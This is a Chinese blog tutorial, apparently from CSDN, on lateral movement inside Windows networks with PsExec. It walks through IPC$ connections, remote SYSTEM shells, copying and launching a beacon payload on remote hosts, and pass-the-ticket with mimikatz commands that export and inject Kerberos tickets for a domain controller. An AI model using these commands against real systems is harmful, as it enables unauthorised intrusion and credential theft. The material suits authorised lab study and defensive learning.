内网渗透-【横向移动】PsExec工具远程命令执行横向移动

于 2024-04-15 00:46:02 发布
阅读量990 收藏 30
点赞数 29
分类专栏: 内网渗透实战 文章标签: 安全性测试 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/137749370
版权

【横向移动】PsExec工具远程命令执行横向移动

文章目录

在这里插入图片描述

PsExec介绍

psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin 

     共享和 
    
   
     i 
    
   
     p 
    
   
     c 
    
   
  
    共享和ipc 
   
  
</span><span class="katex-html"><span class="base"><span class="strut" style="height: 0.8778em; vertical-align: -0.1944em;"></span><span class="mord cjk_fallback">共享和</span><span class="mord mathnormal">i</span><span class="mord mathnormal">p</span><span class="mord mathnormal">c</span></span></span></span></span> (该共享默认开启,依赖于<a href="https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020" target="_blank" class="hl hl-1" data-report-view="{&quot;spm&quot;:&quot;1001.2101.3001.7020&quot;,&quot;dest&quot;:&quot;https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020&quot;,&quot;extra&quot;:&quot;{\&quot;searchword\&quot;:\&quot;445端口\&quot;}&quot;}" data-report-click="{&quot;spm&quot;:&quot;1001.2101.3001.7020&quot;,&quot;dest&quot;:&quot;https://so.csdn.net/so/search?q=445%E7%AB%AF%E5%8F%A3&amp;spm=1001.2101.3001.7020&quot;,&quot;extra&quot;:&quot;{\&quot;searchword\&quot;:\&quot;445端口\&quot;}&quot;}" data-tit="445端口" data-pretit="445端口">445端口</a>)。</p>

但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。

由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools 在这里插入图片描述

PsExec使用条件

1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash)
2、能建立IPC链接(也就是需要通过smb认证的),且目标机器开启了共享(默认开启的),并且目标 共享中必须有admin$共享

PsExec常用参数

psexec \ip -u administrator -p admin cmd 进⼊半交互式shell
PsExec -accepteula \192.168.108.101 -s cmd.exe 建立交互的shell
psexec \ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录
psexec \ip -u administrator -p admin whoami all 执行命令
psexec \ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

实验复现

4.1、IPC$下的psexec

上传psexec

在这里插入图片描述

建立IPC$连接

net use \192.168.41.150\ipc$ “Admin@123” /user:administrator
在这里插入图片描述

返回交互的shell或者执行命令

psexec.exe -accepteula \192.168.41.150 -s cmd.exe 返回交互shell (必须是msf或者远程 到桌面CS不行)
psexec.exe -accepteula \192.168.41.150 -s ipconfig 远程执行命令
在这里插入图片描述
在这里插入图片描述
远程复制

copy C:\Users\admin\Desktop\wanli.exe \192.168.41.150\C$

在这里插入图片描述

远程上线

psexec.exe -accepteula \192.168.41.150 -h -d c:\wanli.exe
在这里插入图片描述

4.2、PTH下的psexecs

找到登录的凭证在这里插入图片描述
找到和扫描地址在这里插入图片描述
进行psexec攻击上线在这里插入图片描述

4.3、PTT下的psexec

上传psexec

在这里插入图片描述

进行PTT攻击
导出内存的票据

mimikatz.exe “privilege::debug” “sekurlsa::tickets /export”

在这里插入图片描述

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
两个都是清除票据

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;998d7]-2-0-40e10000-Administrator@krbtgt-
HACK.COM.kirbi

查看票据

shell klist
mimikatz kerberos::tgt

远程复制

copy C:\Users\admin\Desktop\wanli.exe \dc.hack.com\C$

在这里插入图片描述

远程上线

psexec.exe \dc.hack.com -h -d c:\wanli.exe

在这里插入图片描述

炫彩@之星
关注
  • 29
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
psexec的用法 例
11-03
PsExec 开关 说明 -a 指定处理器关联。 -c 指示是否应将应用程序复制到远程系统。 -d 指定在退出前不等待进程结束(不等待成功或失败的消息)。 -e 使用指定帐户的配置文件加载。 -f 即使远程系统上存在该应用程序也进行复制。确保运行当前(或特定)版本。 -i 在远程系统上以交互方式运行应用程序(如果想要某位最终用户看到该应用程序的任何用户界面,则必须采用这种模式)。 -l 以受限用户身份运行应用程序。删除管理员组令牌并且将进程权限降至用户组成员的权限级别。便于以最低权限运行高风险、面向 Internet 的应用程序。 -n 指定在与远程计算机连接失败之前等待的超时时间。 -priority 按指定的优先级运行进程。即,指定 Windows 应为给定任务所设的进程优先级(-low、-belownormal、-abovenormal、-high 或 –realtime)。 -s 使用系统帐户运行进程(便于运行 Regedit 来访问权限内的注册表项)。 -v 只在所复制应用程序为更高版本时才复制该应用程序。 -x 在 Winlogon 安全桌面上显示 UI(仅适用于本地系统)。 @file 针对文本文件中所指定的所有计算机运行该命令
Psexec远程CMD工具
12-31
psexec是一个远程执行工具,你可以像使用telnet一样使用它。
如何使用 PsExec 执行远程命令
weixin_34315485的博客
05-18 727
前言 这紧紧只是一篇纯技术分享。我们的程序在运行时需要连接多台目标机器,并拷贝目标机器上特定文件夹中的文件。为了方便访问,要在每台目标机器上建立一个特定用户,所以 PsExec 成了实现此功能的一个方案(虽然已经被弃用)。 PsExec 简介 PsExec工具包含在远程管理工具PsTools 中,可以从该地址获取。 开启 Admin$...
一个功能强大的NT2K远程管理工具
weixin_34336292的博客
02-17 214
当网管维护的技术人员,经常要在命令提示符下输入各种命令调试系统,但如果你需要调用其他的机子的命令提示符时候,只能用telnet和远程控制软件,在这两种软件都没有的情况下,还有没有其他的方法呢?有,不但方便,功能也十分强大。它就是sysinternals出的一个功能强大的nt/2k远程管理工具pstools.它的主页为[url]http://www.sysinternals....
使用Psexec.exe 命令远程windows执行命令
聆听风雨的博客
04-10 4194
背景: 博主今天遇到个问题,就是通过远程桌面远程公司电脑的时候一直卡在请稍等页面无法操作。这种问题一般重启即可解决,但由于周末公司也没人帮忙重启。所以想到有没有可以像linux那样命令行的方式远程windows。结果一搜,还真有。 1、下载psexec PsExec - Windows Sysinternals | Microsoft Docs 2、命令行链接 PsExec.exe \\192.168.1.1 -u administrator -p password -i -c cmd.exe
Windows 远程控制之 PsExec
最新发布
一直被模仿,从未被超越
01-12 1239
PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig 等远程启用工具,否则无法显示有关远程系统的信息。远程打开 cmd 命令
CheeseTools:自行开发的横向移动代码执行工具
08-05
通过类似 PsExec 的功能命令执行 / 横向移动。 必须在特权用户的上下文中运行。 该工具基于 CsExec,但旨在允许对服务创建进行额外控制,特别是: 创建(搜索服务是否存在,如果不存在,尝试创建) 启动(搜索...
WMIHACKER:绕过防病毒软件横向移动命令执行工具
03-18
简介:常见的WMIEXECPSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我们创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具) (不需要445端口)。...
SharpNoPSExec:减少文件执行横向移动命令
05-13
执行横向移动命令。 SharpNoPSExec将查询所有服务,并以启动类型禁用或手动,当前状态已停止以及具有LocalSystem特权重用它们,以随机方式选择一项。 一旦选择了服务,它将保存其当前状态,将二进制路径替换为...
108-浅谈PSEXEC做的那些事.pdf
09-20
108-浅谈PSEXEC做的那些事.pdf
内网远程工具
11-02
内网远程连接他人电脑,只要输入ip 密码就可以远程连接他人的电脑
局域网远程软件好用
07-17
电脑windows局域网远程软件,非常的好用方便DWRCC.exe
psexec 远程连接工具
08-24
psexec是一个远程执行工具,你可以像使用telnet一样使用它。 它的使用格式为: psexec \\远程机器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments] 它的参数有: -u后面跟用户名 -p后面是跟...
横向移动检测之远程执行(一)PsExec
qq_27828281的博客
09-18 4391
横向移动——PsExec远程执行分析及溯源
远程调用服务器上的ps,执行远程服务器命令PsExec
weixin_39561673的博客
07-30 434
二、命令如下:>psexec \172.16.88.204 -u vss -p vssp cmd –打开cmd执行命令>psexec \172.16.88.204 -u vss -p vssp -c my.bat三、在下载的文件中还有其它命令,作用有:(2)psservice 管理远程服务器的服务psservice 远程机器ip start tlntsvr(3)pssuspend 暂时...
windows远程命令执行
热门推荐
Shanfenglan's blog
08-26 26万+
以下所有实验均在工作组环境下 psexec psexec.exe \ip –accepteula -u username -p password program.exe psexec.exe \host -accepteula -u domain\username -p password -d -c 获取对方主机的账号密码后且对方开启445端口,可以使用psexec来进行远程命令执行psexec \172.16.99.233 -u administrator -p 123 -c cmd.exe .
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 3325
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动内网渗透方法可实现远程执行命令横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
cobalt strike横向移动
08-19
C知道:对于Cobalt Strike的横向移动,可以通过以下几种方法实现: 1. 密码猜测和弱口令攻击:使用Cobalt Strike的Beacon模块,可以尝试猜测目标系统的密码或者利用已知的弱口令进行攻击。 2. 漏洞利用:Cobalt Strike集成了多个漏洞利用模块,可以通过针对目标系统的漏洞进行攻击,获取系统权限。 3. 借助已有权限:如果已经获取了某个系统的权限,可以使用Cobalt Strike的post-exploitation功能,通过横向移动命令(如psexec、wmic等)在网络中传播。 4. 社会工程学攻击:Cobalt Strike也可以通过发送钓鱼邮件或者利用其他社会工程学手段,诱使目标用户点击恶意链接或者打开恶意文件,从而在目标系统中植入Beacon。 需要注意的是,横向移动是一项高风险的活动,需要谨慎操作,并且遵守法律法规。在合法授权的情况下使用Cobalt Strike进行安全测试是被允许的,但在未经授权的情况下使用是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值